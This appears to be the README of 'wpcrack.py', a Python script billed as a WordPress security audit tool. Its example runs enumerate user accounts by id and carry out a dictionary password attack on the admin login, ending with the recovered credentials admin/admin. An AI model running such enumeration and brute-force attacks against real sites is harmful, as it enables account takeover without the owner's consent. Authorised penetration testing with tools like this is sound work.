Script to audit the security of a WordPress site. Current features:
Example of enumerating users with an id less than or equal to 10 using POST requests:
    $ python wpcrack.py --quiet --url http://target/ enumerate -m POST
    [+] User found (uid: 4): theboss
    [+] User found (uid: 3): user2
    [+] User found (uid: 2): user1
    [+] User found (uid: 1): admin

Example of a dictionary attack against the admin account, also showing the failed attempts:
    $ python wpcrack.py --url http://target/ bruteforce -u admin -w dict.txt
    [-] The password '1234admin' doesn't match
    [-] The password '1234password' doesn't match
    [-] The password 'password' doesn't match
    [-] The password 'pass1234' doesn't match
    [-] The password 'adminstrator' doesn't match
    [-] The password '123456' doesn't match
    [-] The password '1234' doesn't match
    [+] Username: admin
    [+] Password: admin
    [+] Profile : administrator
Thanks to J. M. Fernandez, @TheXC3LL for the suggestions.